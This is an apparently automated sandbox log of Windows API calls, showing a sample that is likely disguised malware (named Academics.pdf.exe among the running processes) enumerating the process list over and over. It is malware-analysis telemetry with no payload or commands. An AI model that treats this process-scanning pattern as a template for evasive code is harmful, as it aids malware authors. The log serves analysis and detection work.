Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0308.808] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0308.809] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0308.810] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0308.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0308.811] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0308.812] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0308.813] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0308.814] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0308.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.815] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.816] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0308.817] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.818] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0308.819] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.820] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0308.821] CloseHandle (hObject=0x294) returned 1 [0308.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0308.821] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.821] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0308.823] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.824] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.825] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.826] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.827] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.828] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.829] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0308.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.833] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0308.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0308.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0308.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0308.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0308.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0308.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0308.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0308.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0308.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0308.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0308.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0308.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0308.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0308.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0308.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0308.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0308.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0308.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0308.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0308.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0308.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0308.855] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0308.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0308.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0308.860] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0308.861] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0308.862] CloseHandle (hObject=0x294) returned 1 [0308.862] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.862] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0308.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0308.864] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0308.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0308.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0308.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0308.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0308.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0308.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0308.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0308.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0308.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0308.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0308.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, 